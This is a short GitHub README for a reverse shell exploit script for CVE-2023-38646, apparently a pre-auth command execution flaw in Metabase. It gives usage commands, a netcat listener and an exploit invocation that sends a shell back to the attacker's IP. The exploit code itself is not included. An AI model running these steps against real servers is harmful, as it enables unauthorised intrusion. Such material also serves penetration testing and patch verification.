passwa11 / CVE-2023-38646

CVE-2023-38646-exploit

"This vulnerability, designated as CVE-2023-38646, allowed attackers to execute arbitrary commands on the server without requiring any authentication."

A quick reverse shell exploit script for CVE-2023-38646. I did not find this vulnerability, just made the script.

Usage

root@box:~/CVE-2023-38646# python3 exploit.py

   _______      ________    ___   ___ ___  ____       ____   ___    __ _  _     __
  / ____\ \    / /  ____|  |__ \ / _ \__ \|___ \     |___ \ / _ \  / /| || |   / /
 | |     \ \  / /| |__ ______ ) | | | | ) | __) |_____ __) | (_) |/ /_| || |_ / /_
 | |      \ \/ / |  __|______/ /| | | |/ / |__ <______|__ < > _ <| '_ \__   _| '_ \
 | |____   \  /  | |____    / /_| |_| / /_ ___) |     ___) | (_) | (_) | | | | (_) |
  \_____|   \/   |______|  |____|\___/____|____/     |____/ \___/ \___/  |_|  \___/

author: c0rnbread
credits:
https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
https://raw.githubusercontent.com/kh4sh3i/CVE-2023-38646/main/CVE-2023-38646.py


Usage: python3 exploit.py <url> <local-ip> <local-port>

Run using the base URL plus the local IP and port for the reverse shell.

root@box:~/CVE-2023-38646# nc -lvnp 4444

root@box:~/CVE-2023-38646# python3 exploit.py http://example.com 10.10.10.2 4444

Credits

https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

https://raw.githubusercontent.com/kh4sh3i/CVE-2023-38646/main/CVE-2023-38646.py
